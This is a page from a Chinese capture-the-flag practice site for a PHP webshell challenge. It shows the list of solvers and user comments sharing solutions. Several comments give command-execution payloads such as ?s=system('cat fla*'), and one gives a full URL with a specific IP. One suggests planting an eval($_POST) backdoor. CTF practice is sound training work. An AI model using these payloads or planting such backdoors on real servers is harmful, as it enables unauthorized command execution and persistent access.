评分(9)
解题动态
szb123 攻破了该题 1小时前
17361232956 攻破了该题 2小时前
皮蛋瘦肉粥 攻破了该题 2小时前
aaa1 攻破了该题 3小时前
初入CTF联盟 攻破了该题 5小时前
hahahahahahaha 攻破了该题 6小时前
GEcharacter 攻破了该题 6小时前
wujiayi 攻破了该题 10小时前
huangfeiyu 攻破了该题 11小时前
晚霞难掩秋色 攻破了该题 11小时前
Julia 攻破了该题 21小时前
hanzkj 攻破了该题 1天前
920917544 攻破了该题 1天前
codegod 攻破了该题 1天前
foxkiller 攻破了该题 1天前
desireart 攻破了该题 1天前
Ywctf 攻破了该题 1天前
orange2015 攻破了该题 1天前
刚哥glory 攻破了该题 1天前
评论
answer 3年前
举报
就离谱 ?system(dir) .........文件名真不错,爱了爱了
iFound 3年前
举报
重点是描述的话,然后是小马用GET构造请求
god536 4年前
举报
/?s=system('cat fla*')
a2cai 4年前
举报
?我还以为作者要整条狗来看门呢,结果直接$_GET['s']=system('ls')就啥都出来了......
ximing 4年前
举报
根据描述应该应该是一个一句话木马,直接提交命令system(ls),然后在直接访问flag文件
shan 4年前
举报
用system(dir)来过这个题目,是作者本来的思路吗。看评论好像大家用的方法还挺多种的。
yinyue 4年前
举报
不多说了,套娃了解下
eleven 4年前
举报
?s=system("cat *.txt")
naihe567 4年前
举报
没法用POST的webshell,可以自己创建一个命令执行eval($_POST[‘xxx’]) 密码xxx
mantou 4年前
举报
http://114.67.246.176:18711/?s=system(%22cat%20xxxxxxxx.txt%22)